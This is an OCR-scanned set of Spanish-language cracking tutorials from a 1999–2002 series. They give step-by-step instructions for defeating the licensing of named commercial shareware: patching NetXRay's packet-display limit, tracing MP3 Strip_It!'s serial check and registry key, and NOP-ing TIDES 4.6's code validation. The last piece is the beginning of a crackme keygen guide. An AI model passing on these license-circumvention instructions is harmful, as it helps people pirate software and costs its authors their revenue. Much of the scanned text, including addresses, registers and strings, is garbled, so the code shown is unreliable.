para reconocer funciones "inline" tipo "strlen" de C (usando el scan object file) y muchas más características 
potentísimas. ...en fin lo mejor que he encontrado. 


| AL ATAKE 


Como lo que el programa restringe es el número de items que se cargan en el Listbox de los paquetes que se capturaron, 
lo interesante sería primero ver si efectivamente no se cargan esos paquetes porque no se levantan de la red (lo cual sería 
un problema) o simplemente se levantan todos los que circulan por la red pero solo se limita el número de ellos que se 
muestran.Poniendome en el lugar del programador que realizó esta limitación, sería muy incómodo tener que tocar el 
código de captura pués es el código fundamental del programa, y sería más sencillo capturar todo y sólo mostrar unas 
pocas (5) de estas tramas!!! 

Un inconveniente que no he solucionado aún en programas que utilicen las MFC es el tema de los ordinales, por lo cual 
(al menos por ahora) utilizo el archivo "mfc42.def" para encontrar el nombre de la función correspondiente al ordinal 
que busco (si alguien sabe alguna forma más comoda solo avise!). 

Comento al menos para mi es un poco más complicado trabajar con programas que utilicen las MEC por todo lo que las 
mismas clases mantienen oculto, aunque teniendo los fuentes de las MFC que vienen con el VStudio es más sencillo. 

Lo primero es entonces ver donde se crea la ventana que mostrará las capturas (así como también hubiese estado bien 
ver donde se le indica al ListBox que agrege un item con SendMessage y LB_ADDSTRINO), para ello primero 
debemos saber que ventana es la que se crea , para lo cual podermos poner un breakpoint en Create WindowEx dentro 
del modulo mfc42.dll y a la vez investigar con el spy++ el tipo de clase a la que pertenece la ventana nueva y sus 
controles. Luego de encontrar inspeccionar vemos que la clase de la ventana nueva es "Afx:400000:b:1456:6:4f07", y la 
que contiene el ListBox es una SubClasificación de la está última que que se llama "NetXVList" , por lo que buscamos 
donde se crea esta ventana...y encontramos 


004844CF . PUSH O 

004844D1 . PUSH NETXRAY.0059D3B4 ; ASCII "NetXVList" 
004844D6 . MOV ECX, EBX 

004844D8 . CALL <JMP.8:MFC42.+2124> 

004844DD .MOV EBP, DWORD PTR SS:[ESP+10] 


donde MFC42.+t2124 es el ordinal de la función mfc "CWnd::Create” como se ve en el .def que además pone unos 
cuantos caracteres raros: "?CreateoCWndO CUAEHPBDOKABUtagRECTO EOPAV1OIPAUCCreateContextO EZ 2124 
NONAME" 


Ok, un gran avance, pero lo importante está por venir...seguimos analizando y vemos como crea el resto de los controles 
en esa ventana, llama distintas APIs y algunas mfc hasta que se llega a : 


004846D2 .>LEA ECX, DWORD PTR DS:[ESI+48] 

004846D5 .>CALL <JMP.8:MFC42.16242> ; SubClassWindow-CWnd 
004846DA >>MOV ECX, DWORD PTR DS:[ESI+A8] 

004846E0 .»PUSH 1 ; /Erase = TRUE 

004846E2 .»PUSH 0 ; |pRect = NULL 

004846E4 .»PUSH ECX ; |hWnd 

004846E5 ..¿ CALL NEAR DWORD PTR DS:[<8£USER32.InvalidateRect>] ; WinvalidateRect 
004846EB .»PUSH 5 

004846ED .»MOV ECX, EDI 

004846EF .>CALL <JMP.£MFC42.6215> ; ShowWindow 

004846F4 .»-MOV ECX, EBP 

004846F6 .>CALL 00463260 : <========== AQUI ESTA! 
004846FB .>LEA EDI, DWORD PTR DS:[ESI+178] 

00484701 .?»MOV EBX, EAX 

00484703 .?»MOV ECX, EDI 

00484705 .»MOV DWORD PTR SS:[ESP+14], EBX 

00484709 .>-CALL 004C0B80 

0048470E .»MOV EDX, DWORD PTR DS:[ESI+198] 

00484714 .>PUSH O ; /IlParam =0 

00484716 .»PUSH 0 ; |wParam = 0 

00484718 .»PUSH 602 ; [Message = MSG(602) 

0048471D .»PUSH EDX ; |hWnd 

0048471E ..¿CALL NEAR DWORD PTR DS:[<8USER32.SendMessageA>] ; ISendMessageA 
00484724 .-PUSH EBX 

00484725 .?»MOV ECX, EDI 

00484727 .,CALL 00482D30 ; Set ByteArray Size 


vemos que llama a una funcion con el "CALL 00463260", y vemos con que nos encontramos... 


00463260 MOV ECX, DWORD PTR DS:[ECX+58] 

00463263 TEST ECX, ECX 

00463265 JE SHORT 00463277 

00463267 CALL 00492C10 ; <= AQUI ESTA LA OTRA FUNCION!!! 
0046326CCMP EAX, 5 ; Mostrar más de 5 tramas? 

0046326F JLE SHORT 00463279 

00463271 MOV EAX,5  ;Si=> limita a 5 

00463276 RETN 

00463277 XOR EAX, EAX 

00463279 RETN 


donde se ve que llama a una función que retorna un valor en EAX donde el programa compara para ver si es mayor a 5, 
y en ese caso reemplaza EAX por 5 ...sospechoso... podría indicar que de aqui me limita el número de tramas a mostrar. 
Pero más evidente será si miramos la función que llama: 


00492C10 MOV EAX, DWORD PTR DS:[ECX+3C] ; Puntero a estructura? 

00492C13 MOV EAX, DWORD PTR DS:[EAX+10] ; EAX = *(p + Offset) (Nro de tramas a mostrar) 

00492C16 RETN 

Aqui se ve que el puntero que pone en EAX viene a ser algún tipo de estructura o clase que no he descubierto pero que 
indica lo siguiente: por un lado con un offset de +10 encuentra ahí el número de tramas a mostrar (nunca mayor a 5, 
osea que en algún otro lado hay otra limitación) y lo devuelve en EAX, pero también vemos que en un offset -18 está el 
número total de tramas levantadas!!!. Esto ultimo se ve haciendo un dump de la zona de memoria del puntero DWORD 
PTR DS:[ECX+3C], y sobre todo se encuentra que luego vienen las tramas que ha levantado (se puede reconocer 
fácilmente los ping en memoria), y para mejor, si por ejemplo estuve haciendo muchos ping_ seguidos y han sido 
capturados N tramas, vemos que en el dump aparecen las N tramas!!!! es decir que , como mi intuición de programador 
me indicaba, siempre captura todas las tramas pero muestra algunas. Llegado este punto las opciones son claras, por un 
lado tenemos la función que limita a 5 las tramas a mostrar , y por otro la que devuelve el número a de tramas 
disponibles que a su vez también está limitada (en alguna otra parte del código). 

Es hora de "patchear" el codigo... es muy interesante el encontrarnos con tantos nop's cercanos a la función pues 
permitirán utilizarlos para agregar algunas lineas de código. 

Primero quitamos esa comprobación respecto a 5, por lo que ponemos la función del siguiente modo: 


00463260 MOV ECX, DWORD PTR DS:[ECX+58] 
00463263 TEST ECX, ECX 
00463265 JE SHORT 0046326D 


00463267 CALL 00492C10 ; Llama a la función patcheada !!! 
0046326C RETN ; retorna que muestre todos los paquetes capturados 
0046326D XOR EAX, EAX 

0046326F RETN 


Luego modificamos la segunda función, para que cada vez que sea llamada copie de está estructura el valor del número 
de tramas capturadas donde está el valor del número de tramas a mostrar, y además devuelva este valor en EAX. De esta 
forma cada vez que se llame a esta función (se la llama por todos lados) nos aseguramos de mantener anulada la 
limitación. Para realizar esto necesitamos utilizar un registro (elijo el EST) 

por lo que recurro a los nop's existentes para agregar los push/ pop para este registro y el resto : 


00492C10 PUSH ESI ; Salvo ESI 

00492C11 MOV ESI, DWORD PTR DS:[ECX+3C] ; Puntero a Estructura !!! 

00492C14 MOV EAX, DWORD PTR DS:[EST-18] ; Offset a Tramas Capturadas (y queda en EAX) 
00492C17 MOV DWORD PTR DS:[ESI+10], EAX ; Copio a Offset Tramas a Mostrar 

00492C1A POP ESI  ; Restauro ESI 

00492C1B RETN ; quedó en EAX que muestré todas!!! 


Ahora no queda más que utilizar un editor hexa para cambiar las lineas de codigo por las nuevas que les acabo de 
mostrar y ya estará listo el nuevo ejecutable. Obviamente hay muchas cosas que no entraron en este tutorial pero que 
fueron haciendo que llegue a estás conclusiones (como dumps de memoria , y pruebas de distinto tipo como el buscar 
donde se agregan los items al ListBox, etc) 

Bueno, espero disfruten este magnifico Sniffer (al menos hasta que aparezca la restricción de los 30 días, pero esa será 
otra historia) 


Espero haber sido claro por ser la primera vez... 
Tamoxifenolfdata54.com 


Saludos: 
- A mi piojito hermoso 
- La gente de la 30 y del Fhelipe 


- Karpoff , nuMIT y los que colaboran en el crack, a quienes no conozco pero de quienes siempre se aprende. 
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Karpoff Spanish Tutor 1999-2002 


MP3 Strip_It! Digital v 5.2.2.11 


Número de Serie y limite de trabajo a 30 días 


Obtener un número de serie válido 


229772297? 


Newbie 


http://www.digitalcandle.com 


File Inspector , DeDe , Softl ce 
GZRIP FECHA: 01/02/2002 


INTRODUCCION 


Hola de nuevo , vanos a trabajar esta vez con un programa llamado MP3 Strip_It! Digital que permite extraer 
pistas de CD's de audio y pasarlas a formatos Wav o MP3 entre otros . 


AL ATAKE 


Como siempre utilizaremos el Filel nspector para ver de que se trata : 


gu file insPEctor XL a E 


ES Modificar | Me] Herramientas | Xé Plug-Ins | GA Procesos | 0 acerca de... | 
3 cabezera PE | [5] cabezera MZ | [+] Secciones | “$ Funciones (6% Compilador 


Compilador /Compresor/Protector 


Borland Inprise Delphi 4 


Signatura: < 55 8B EC 83 C4 F4 ES 60 34 53 00 ES 14 41 ED FF 33 
CO 55 68 DF 36 53 00 64 FF 30 64 89 20 8B 0D 84 74 53 CodeDaemon 
DO 86 09 B2 01 41 6C 51 52 00 > 
8 Info... 


PF Permitir análisis heurístico 


Versión del 50; 1.0 Versión de la imágen: fo. 
Versión del enlazador: [2.25 Versión del subsistema; fa. 


D [2 Abrir archivo + Lo Analizar Pl sali 
CAPruebaiMP3 Strip_ltl Digital Strip_it.exe 1,354 secs. 


Vemos que está hecho con Borland Delphi 4 .Vamos a la pestaña Secciones para saber si tiene algún tipo de 
protección anti - Desensamblado o anti - debugger 


$4 file insPE ctor XL a ES 


ES Modificar | Uf Herramientas | e Plug-Ins | <A Procesos | lO acerca de... | 
$ cabezera PE | 5] Cabezera MZ [4] Secciones |] :S Funciones | $9 Compilador | 


Name | Virtual Address | Virtual Size Phisic Address | Phisic Size | Characteristics 


4] coDE 00001000 00132018 00000400 00132E00 60000020 
CIDATA 00134000 00003D10 00133200 00DO3E00 C0000040 
(ess 00138000 00001375 00137000 00000000 CoO000000 
( .idata 00134000 00003358 00137000 00003400 C0000040 
( .tis 0013E000 00000014 00134400 00000000 CODODODO 
(7 .rdata 0D13FO0O 00000018 00134400 00000200 50000040 
(1 .reloc 00140000 00015130 00134600 00015200 50000040 
O .rsre 00156000 ODO7EE0O 0014F500 ODO 7EE0O 50000040 


[pe sections +] p Alinear sección 4 Volcar sección ag Añadir Sección 


D [2 abrir archivo + 7 Analizar e Salir 
CAPruebasMP3 Strip_ltl DigitalVStrip_it.exe F 1,354 secs. 


Como veis no es así por lo tanto sólo nos queda arrancarlo para ver que deducciones sacamos antes de 
destripar : 


MP3 Strip_It! Suite - REGISTRATION 


Registration 


Thank you for pour interest in registering MP3 Strip_lt! Digital. 


Registration entitles you to free upgrades and allows you to legally 
run Strip_lt past it's 30 day limit. 


The registration fee is $25.00 US Dollars. 


To purchase MP3 Strip_ltl by check, money order or cash click the 
'By Mail' button. 


To purchase by credit card, open the following address with your 
web browser. 
http: ¿2ww alaciersoftware.comésite coi?page=see msd 


Once you have received your registration code via email. 
Enter the following information and click Register_ltl 


Full Name [c4sE sensitive Registration Code 
(AGZRIP hi 234567890 


By Mail | 


Bueno , lo de siempre , que si 30 días , que si lo podemos comprar por una serie de dólares etc... No perdamos 
riempo , introducimos los datos e intentamos registrarnos : 


(X) l'm sorry but pou have entered an invalid Registration Code. 


Your Name and Code are case-sensitive, meaning you MUST enter a captial where it should be capital letter and a 
lower-case letter where it should be a lower-case letter 


Ifyou are still having trouble please contact Tech Support at supportGMdigitalcandle.com. 


Nunca perderé la esperanza de introducir algún día un número y que me diga "Gracias por registrarte" , pero 
bueno esta vez vuelve a decir que no . 


Como siempre carguemos el programa con el Loader del Softl ce y pongamos los BPX que tengamos por 
costumbre , yo como siempre : GetWindowTextA , GetDlgltemTextA y MessageBoxA. Pero esta vez no salta 
con ninguno , por lo que me decanto por el de siempre : Hmemcpy . 

Damos F5 una vez, para saltar el nombre introducido y a continuación F12 tantas veces como sea necesario 
hasta que en la parte inferior de la pantalla de desensamblado aparezca algún tipo de referencia al programa 
con el que trabajamos , en este caso STRIP_IT!CODE+0002AAA6D que nos indica que ya estamos dentro de él. 
Una de las cosas más comunes cuando utilizamos Hmemcpy es que entremos en el programa con intrucciones 
de este tipo : 


cs:42BA72  POPESI  <----- Caemos aquí 
cs:42BA73 POP EBX 
cs:142BA74 — RET 


Comenzar a dar F10 para salir de todas estas instrucciones hasta llegar a una parte del programa que parezca 
que tiene más código, en este caso STRIP_I1T!CODE+0001239D8 : 


cs:5249DD MOV EDX,[EBP-01AC] Lorna Nuestro número 
cs:5249E3 POP EAX Gamma D EAX = número válido 
cs:5249E4 — CALL 4022A4 

Ccs:5249E9 ccoccoannanennnnnnnas 


Está bien claro que en todo lo que hemos hecho teóricamente no hemos entrado en ninguna llamada que 
generase la rutina de creación del número ( si cambiamos el nombre , cambia el número ) así que hemos 
llegado sólamente cuando estaba a punto de comprobarlo , probablemente en la CALL siguiente . 

Bien no es mi proposito el localizar esta vez dicha rutina y ver como genera dicho número ; pero si alguno está 
interesado no debe olvidar que al principio hemos detectado que estaba hecho en Borland Delphi y ¿ cual es el 
programa por excelencia para trabajar en este tipo de programas ? si señor el DeDe. 


Classes Info | Units Info | Forms || Procedures | Project | Esports | 


TFRegister 


about2 TFábout 
uE TFChoice | Events | Controls | 
config TFConfig 
DBLogDlg TLoginDialog : POR 
E abRegister_MailClick 00524740 
O iS obResister_ lECick 00524948 0019 
e a FormKeyDown 00524048 0012 
MMDesign MiDesetom Label OClick DOS24CBC 0013 
o rien TFRenster “PROC”D052475B 00524758 FFFF 
sopa T ESplash “PRODC”00524764 00524764 FFFF 
totd TFTotd “PRODC”00524772 00524772 FFFF 
“PROC”00524774 00524774 FFFF 
“PRDC”0052477C 0052477C FFFF 
“PROC”00524788 00524788 FFFF 
“PROC”0052479F 0052479F FFFF 


Si en gbRegister_ItClick apretaos botón derecho del ratón y picamos en Show additional data nos aparece : 


gbRegister_ltClick 


Event = OnClick 
Owner = gbRegister_tTBitBtn] 
Caption = 'Register_ltl' 


que nos indica que vamos por el buen camino ya que este es el botón que apretamos para validar el nombre y 
número introducidos .Solo nos queda picar en gbRegister_ItClick con el botón izquierdo del ratón y estaremos 
en la rutina pertinente : 


¡TFRegister.gbRegister_ItClick Pl ES 
Navigation Edit Plugins 


JA HA 


K 
-<¿4u TFRegister.obRegister_ | [00524948 
D0524949 B8BEC mov ebp, esp 
D052494B 81C44CFEFFFF add esp, $FFFFFE4C 
00524951 53 push ebx 
DOS524952 3309 xor e£cx, ecx 
DO0524954 S98D4CFEFFFF mov [ebp+$FFFFFE4C], ecx 
DO0524954 S98D5OFEFFFF mov [ebp+$FFFFFES5O], ecx 
D0524960 S898D5CFEFFFF mov [ebp+$FFFFFESC], ecx 
D0524966 S98D54FEFFFF mov [ebp+$FFFFFE54], ecx 
DO052496C S98D5SFEFFFF mov [ebp+$FFFFFE53], ecx 
DOS524972 SBDS mov ebx, eax 
DO0524974 S2DS560FFFFFF lea eax, [ebp+?FFFFFF60] 
* Reference to object TStrip_It_RPeg 
| 
1A| D052497A 8B15F4695200 mov edx, [$5269F4] y] 


A partir de aquí solo nos queda cargar el programa con el Loader del Softice y poner un BPX 524948 para que 
salte al intentar registrarnos y por descontado mucha paciencia para ir rastreando .Pero , ¿donde guarda la 
clave ? pues en el registro de Windows , exactamente en : HKEY_USERS| DEFAULT Softwarel Glacier 
Softwarel MP3_Strip_It_ Digitall REG que si borramos hacemos que vuelva a quedar sin registrar. 


Conclusión 


Bueno otro que cayó. Si quereis preguntarme algo me encontrareis aquí : (OGZRIP . Hasta pronto , un 
saludo. 


NOTA: Lo que aquí se expresa es sólo con fines educativos. El divulgar conocimientos no puede hacerme 
responsable del uso que se le quiera dar a este material. Así que disfrutalo , destripalo y finalmente , compraló 
( si puedes ). 
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Programa: TIDES 4.6 / MAREES 4.6 


Nombre/código. En la versión shareware, algunas opciones no son 


PROTECCION: : Ñ ; : 
operativas y algunos puertos no están disponibles. 
E . Calcula las mareas en una serie de puertos que se encuentran en 
Descripcion: A e A 
una base de datos, ampliable en la versión registrada. 


RA 


DOWNLOAD: http://www.navilog.com 


Herramientas: W32dasm, OLLYDBG 


CRACKER: Francisco FECHA: 03/02/2002 


INTRODUCCION 


El programa TI DES (en la versión inglesa, aunque existe una versión francesa llamada MAREES) sirve para calcular 
las mareas que se producen en un determinado lugar de costa. Como aficionado a la pesca en el mar, cuando vi el 
programa me pareció interesante, porque, como saben los aficionados, hay más posibilidades de conseguir una 
buena pesca cuando la marea está subiendo que cuando está bajando. Con este programa podemos saber, entre 
otras cosas, las horas y alturas aproximada de las pleamares y bajamares en un determinado puerto. En la versión 
registrada se pueden añadir nuevos puertos a partir de ficheros que pueden descargarse desde la página del autor. 


El problema que me encontré es que los puertos que me interesaban (de España) no aparecían en la lista de 
puertos propuestos en la versión shareware, y antes de adquirir el programa deseaba comprobar si los datos 
proporcionados por el programa coincidían, al menos de forma aproximada, con los datos de una “tabla de mareas 
que poseía. 


, 


Soy novato en esto de hacer cracks (hace unas dos semanas que he comenzado a practicar, y sólo he hecho 
algunos ejercicios sencillos), y me ha costado bastante encontrar una 'solución' al problema, aunque al final he 
encontrado una sencilla (que considero temporal, porque, aunque me ha funcionado, no me satisface totalmente, 
porque hubiera preferido un generador de códigos), que es la que describo a continuación. 


Para depurar el programa y registrar TI DES utilicé OllyDBG (no he utilizado SOFTICE porque aún no me encuentro 
cómodo con él y no deseaba volver a arrancar el ordenador). 


Verifiqué que el programa no está comprimido y, aunque comprobé que está escrito en Delphi, no utilicé DEDE 
porque aún no conozco bien este programa. 


| AL ATAKE 


Comenzamos viendo qué debemos buscar. Para ello arrancamos el programa TI DES.EXE 
(MAREES.EXE en la versión francesa) y vemos que se presenta una pantalla declinando 
responsabilidades por el uso del programa y, una vez que se acepta, se presenta una pantalla 
indicando que es una versión Shareware. En lo que sigue me referiré a la versión inglesa. 


Intentamos registrar el programa desde la opción Tools/Licence. Aquí aparece una ventana 
solicitando el nombre del usuario y un código de registro; aparece, protegido un número de usuario 
(que, según vi luego, cambia cuando se instala en otra máquina, por lo que, aparentemente, es 
Calculado en función de alguna característica del ordenador). Escribimos un nombre de usuario y una 
clave, y al aceptar nos muestra un mensaje “code unvailable' (al menos es lo que me indicó a mí 
todas las veces que probé). 


¡Comencemos con WDASM. El programa es bastante grande y tarda un rato en desensamblarlo. En 
String references' buscamos el texto que nos ha presentado y tenemos suerte, encontramos que se 
referencia en: 


:004D22AA 33C9 xor ecx, ecx 

:004D22AC 8A08 mov cl, byte ptr [eax] 

:004D22AE 41 inc ecx 

:004D22AF E8C809F3FF call 00402C7C 

:004D22B4 7517 ¡ne 004D22CD 

1:004D22B6 6A00 push 00000000 

:004D22B8 668B0D20234D00 mov cx, word ptr [004D2320] 
1:004D22BF B202 mov dl, 02 

* Possible StringData Ref from Code Obj ->"Code non valide" 


| 

1:004D22C1 B83C254D00 mov eax, 004D253C 

:004D22C6 ESA136F8FF call 0045596C 

1:004D22CB EB15 jmp 004D22FE2 

* Referenced by a (U)nconditional or (C)onditional  ump at Address: 
|:004D22B4(C) 


| 

:004D22CD 6A00 push 00000000 

:004D22CF 668B0D20234D00 mov cx, word ptr [004D2320] 
:004D22D6 B202 mov dl, 02 

* Possible StringData Ref from Code Obj ->"Code unvailable" 


[ 
:004D22D8 B854254D00 mov eax, 004D2554 
:004D22DD ES8A36F8FF call 0045596C 


Analizamos las líneas previas a la presentación del mensaje y vemos en :004D22C6 un call 0045596C, 
¡que, enseguida vemos que no puede corresponder al análisis de la validez del código (porque aparece 
también en la dirección :004D22DD, por lo que debe corresponder a la presentación del mensaje). 


Seguimos un poco más arriba y vemos que en la dirección :004D22AF se hace otra llamada a una rutina, seguido por un salto 
condicional en :004D22B4, No vale la pena mirar mucho en la rutina llamada por :004D22AF, porque, analizando el contexto, 
vemos que sólo puede servir para determinar el idioma en que presentará el mensaje de error. 


Seguimos mirando las líneas anteriores y no veo nada especialmente significativo hasta que llegamos 
a: 


* Referenced by a (U)nconditional or (C)onditional  ump at Address: 
11:004D2081(C) 


| 
:004D20AB 8D55F4 lea edx, dword ptr [ebp-0C] 


1:004D20AE 8B86F0020000 mov eax, dword ptr [esi+000002FO] 
:004D20B4 ESEBF2F5FF call 00431344 

:004D20B9 8B45F4 mov eax, dword ptr [ebp-0C] 
:004D20BC E8D36EF3FF call 00408F94 

1:004D20C1 8B158CA14E00 mov edx, dword ptr [004EA18C] 
:004D20C7 0302 add eax, dword ptr [edx] 

:004D20C9 8945F0 mov dword ptr [ebp-10], eax 
1:004D20CC DB45FO fild dword ptr [ebp-10] 

:004D20CF D83514234D00 fdiv dword ptr [004D2314] 
1:004D20D5 83C4F4 add esp, FFFFFFF4 

:004D20D8 DB3C24 fstp tbyte ptr [esp] 

1:004D20DB 9B wait 

1:004D20DC E88BO9F5FF call 00422A6C 

:004D20E1 8B158CA14E00 mov edx, dword ptr [O04EA18C] 
1:004D20E7 8902 mov dword ptr [edx], eax 

1:004D20E9 8D55F4 lea edx, dword ptr [ebp-0C] 
:004D20EC 8B86D0020000 mov eax, dword ptr [esi+000002D0] 
:004D20F2 ESADF2F5FF call 00431344 

:004D20F7 8B45F4 mov eax, dword ptr [ebp-0C] 
:004D20FA E8956EF3FF call 00408F94 

1:004D20FF 8B158CA14E00 mov edx, dword ptr [004EA18C] 
:004D2105 3B02 cmp eax, dword ptr [edx] 

:004D2107 0F8542010000 ¡ne 004D224F 

:004D210D A1BC9F4E00 mov eax, dword ptr [004E9FBC] 
:004D2112 BA18234D00 mov edx, 004D2318 

1:004D2117 33C9 xor ecx, ecx 

1:004D2119 8A08 mov cl, byte ptr [eax] 

:004D2118B 41 inc ecx 

1:004D211C ES85BOBF3FF call 00402C7C 

:004D2121 7517 ¡ne 004D213A 

:004D2123 6A00 push 00000000 

:004D2125 668B0D20234D00 mov cx, word ptr [004D2320] 
1:004D212C B202 mov dl, 02 

* Possible StringData Ref from Code Obj ->"Thanks to have register mar" 


l 

1:004D212E B82C234D00 mov eax, 004D232C 

:004D2133 E83438F8FF call 0045596C 

:004D2138 EB15 ¡mp 004D214F 

* Referenced by a (U)nconditional or (C)onditional J ump at Address: 
[[:004D2121(C) 


l 

1:004D213A 6A00 push 00000000 

:004D213C 668B0D20234D00 mov cx, word ptr [004D2320] 
1:004D2143 B202 mov dl, 02 

6 Possible StringData Ref from Code Obj ->"Merci d'avoir souscrit " 


| 

11004D2145 B888234D00 mov eax, 004D2388 

:004D214A E81D38F8FF call 0045596C 

* Referenced by a (U)nconditional or (C)onditional J ump at Address: 
11:004D2138(U) 


1:004D214F B201 mov dl, 01 

:004D2151 A100104600 mov eax, dword ptr [00461000] 
:004D2156 ESE5EFF8FF call 00461140 

1:004D215B 8945FC mov dword ptr [ebp-04], eax 


1:004D215E 33D2 xor edx, edx 

1:004D2160 55 push ebp 

1:004D2161 68C8214D00 push 004D21C8 

:004D2166 64FF32 push dword ptr fs: [edx] 

:004D2169 648922 mov dword ptr fs:[edx], esp 

1:004D216C 33C9 xor ecx, ecx 

* Possible StringData Ref from Code Obj ->"Softwaral Marees" 


l 

1:004D216E BAFC234D00 mov edx, 004D23FC 
:004D2173 8B45FC mov eax, dword ptr [ebp-04] 
1:004D2176 ESCLIFOFSFF call 0046123C 

1:004D217B 84C0 test al, al 

:004D217D 7433 je 004D21B2 

:004D217F 8D45F8 lea eax, dword ptr [ebp-08] 
:004D2182 8B151CA24E00 mov edx, dword ptr [004EA21C] 
:004D2188 E8DF1CF3FF call 00403E6C 

:004D218D 8B4DF8 mov ecx, dword ptr [ebp-08] 

* Possible StringData Ref from Code Obj ->"utilisateur" 


| 

:004D2190 BA14244D00 mov edx, 004D2414 

1:004D2195 8B45FC mov eax, dword ptr [ebp-04] 
1:004D2198 E83BF2F8FF call 004613D8 

1:004D219D 8B0D8CA14E00 mov ecx, dword ptr [004E£A18C] 
1:004D21A3 8B09 mov ecx, dword ptr [ecx] 

* Possible StringData Ref from Code Obj ->"code" 


l 

1:004D21A5 BA28244D00 mov edx, 004D2428 
1:004D21AA 8B45FC mov eax, dword ptr [ebp-04] 
:004D21AD ESCAF2F8FF call 0046147C 


¡Aquí parece que, cuando se cumplan determinadas condiciones, registra el producto y escribe en 
HKEY_CURRENT_USER Software Marees dos cadenas llamadas 'Utilisateur' y “Code'. Aunque parece absurdo, como algunos 
[programas no realizan la comprobación una vez creada la clave, intento crear las claves Utilisateur' con mi nombre y 'Code' 
[con un valor, pero al volver a arrancar el programa me encuentro aún con el mensaje de 'Unregistered”; conclusión: como era 
¡de esperar, el programa realiza la comprobación de validez de los datos escritos; no obstante, por el tiempo que ha llevado 
¡hacer esta prueba, valía la pena intentarlo. 


Vemos un CALL 00402C7C, que, aparentemente, sólo sirve para elegir el idioma de edición. Un poco 
lantes aparece J NZ 004D224F, que al mirar en la dirección apuntada indica que “Sorry, the name 
doesn't correspond to the code”, esto es, que el valor que hemos escrito no es válido para el nombre 
elegido. Sin embargo, no es éste el mensaje que hemos obtenido sino “Code unvailable', que indica 
¡que el código es el que está mal. Un poco antes está CALL 00408F94, que parece que controla la 
validez del código escrito. |ntento seguir la pista a la rutina llamada, para poder determinar el código 
¡bueno para mi nombre, pero realiza constantes saltos a otras rutinas, así que utilizo OLLYDBG, 
¡poniendo un punto de parada en 4D20FA y sigo la ejecución con F7 y F8 hasta que, después de 
bastante tiempo obtengo el mensaje de error, pero se han realizado tantos controles en diversas 
rutinas que no consigo determinar la forma exacta en que se determina el código. Veo que se hacen 
¡muchas comprobaciones en distintas rutinas (al parecer, según lo que se realiza en la dirección 
100402DA3, la clave debe ser un valor numérico, sin letras u otros caracteres, salvo +, -, Xx O X), y 
diversas operaciones con los valores de una transformación del nombre de usuario (transformado en 
¡un número, sumando los bytes de cada letra del nombre, después de haberla pasado a mayúsculas), 
iy con el número de usuario (que como he indicado al principio depende del ordenador), todo ello con 
¡constantes saltos de un sitio del programa a otro. Después de algunas horas intentando seguir la 
¡pista para intentar encontrar el algoritmo y determinar la clave que correspondía a mi nombre, 


idescarté este procedimiento, temporalmente, e intenté otra aproximación. 


¡Para esto, en OLLYDBG pruebo a poner cinco NOP's en lugar del CALL 00408F94 y veo que, en lugar 
¡de presentar el mensaje de “Code unvailable' aparece un mensaje de falta de correspondencia entre 
lel nombre y el código introducido (Sorry, The name doesn't correspond to the code. Please check the 
linformations”), al activar el salto de no coincidencia de claves JNZ 004D224F". Así hemos conseguido 
¡evitar la validación del código, aunque no hemos conseguido registrar el programa. Como el mensaje 
laparece porque se ha activado el salto ]NZ 004D224F, por falta de coincidencia entre el contenido de 
leax y el contenido de edx (claves “buena' y “mala' tras haber sido procesadas por el algoritmo sobre 
llos datos capturados), 'nopeo' con seis NOP's la instrucción. Ahora me indica que el programa está 
¡registrado y que todos las opciones quedan activadas. Verifico, con REGEDIT, el contenido del 
Iregistro y veo que ha escrito unos valores en la cadena “utilisateur' (el nombre de usuario que yo 
¡escribí en la pantalla) y en la cadena'code' (un valor generado por el sistema). A partir de este 
momento, cuando se arranca el programa no aparece el mensaje de “Shareware”, y la lista de puertos 
les más amplia que en la anterior, aunque muchos países continúan sin estar activados. 


¡En este punto veo que la causa de que los países no estén activados es que no contienen puertos en la base de datos y que 
[pueden descargarse desde la página del autor del programa. Descargo los datos de algunos de los países, que cargo en el 
[programa mediante la opción de “Agregar puertos' y se van activando los países que aparecían desactivados. Sin embargo, en 
lla página del autor no hay, por el momento, datos que se puedan descargar para España, así que tampoco me sirvió 
Idemasiado el trabajo, porque continúo sin poder ver datos de puestos de España. 


Salgo del programa y vuelvo a entrar; veo que ahora aparece como registrado el programa y que 
todo funciona con normalidad: al final hemos tenido un poco de suerte, porque el valor que ha escrito 
¡en la cadena “code' del registro es el valor 'bueno' (como han coincidido los datos procesados por el 
[algoritmo y disponemos de una clave “'buena' y otra 'mala', el programa podía haberse escrito la clave 
''mala' y entonces me hubiera indicado que el programa continúa sin registrar). 


¡Por último, analizo con un editor de bases de datos la base de datos entregada con el programa y 
¡observo que algunos de los registros están borrados y que unos pocos corresponden a puertos de 
¡España.Los recupero con un editor de bases de datos y reconstruyo los índices, y, aunque puedo 
visualizar las mareas de estos puertos, en la operación se ha perdido la información de los países. 
¡Aparentemente, al reconstruir los índices se pierde alguna información que permite distribuir los 
[puertos por países. 


La solución que he dado es temporal, porque intentaré analizar las operaciones que realiza el 
[programa para hacer un generador de claves, que me parece una solución más elegante. 


¡Observación. Aunque no es necesario dejar los 11 NOP's escritos, porque el programa funciona, 
laparentemente, sin ningún problema, puede ocurrir que deseemos registrarlo en otra computadora o 
[para otro usuario. Para que vuelvan a aparecer las opciones de registro, sería suficiente con entrar en 
¡el registro con el programa REGEDIT, en la clave que hemos indicado anteriormente, y cambiar 
¡cualquier cosa en las cadenas 'Utilisateur' o “Code'. La próxima vez que arranquemos el programa se 
¡indica que no está registrado, pero si se pone cualquier usuario y clave, registra el programa para el 
¡nuevo usuario. 


¡Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: Crack-KeyGen-Me v1.0 de RAZiEL 

PROTECCION: Name / Serial, Empacado 

Objetivo: Hacer un Keygen 

Descripcion: Excelente programita, realmente te hace pensar 

Dificultad: Media. 

DOWNLOAD : Sitio Oficial del Grupo [K-FoR] 

Herramientas: OllyDBG, W32dasm, UPX v1.07, PEiDentifier v0.71 beta 

CRACKER : ByTESCRK FECHA: 07/01/2002 
INTRODUCCION 


Creo que a muchos nos ha pasado (o por lo menos no me considero el único), después de crackear 
muchos programas y realmente ver lo fácil de ALGUNAS protecciones nos aburrimos y empezamos a 
crear nuestros Crackmes o a romper los ya existentes para desaburrirnos, bueno pues aqui va uno 
de los crackmes a los cuales les he destripado las entrañas y es que he andado mero destripador de 
crackmes en estos últimos días, creo que las aplicaciones ya no me suben tanto la bilirrubina como lo 
hacen los crackmes. Bueno pues alli les va este... 


AL ATAKE 


Lo primero, ver el programa en sí, genial no podiamos esperar nada más es un Crackme y como tal solo tiene la cajita de texto del nombre y la del serial, ahora ingresamos nuestros datos falsos... 


Nombre: ByTESCRK 
Serial: 19770424 


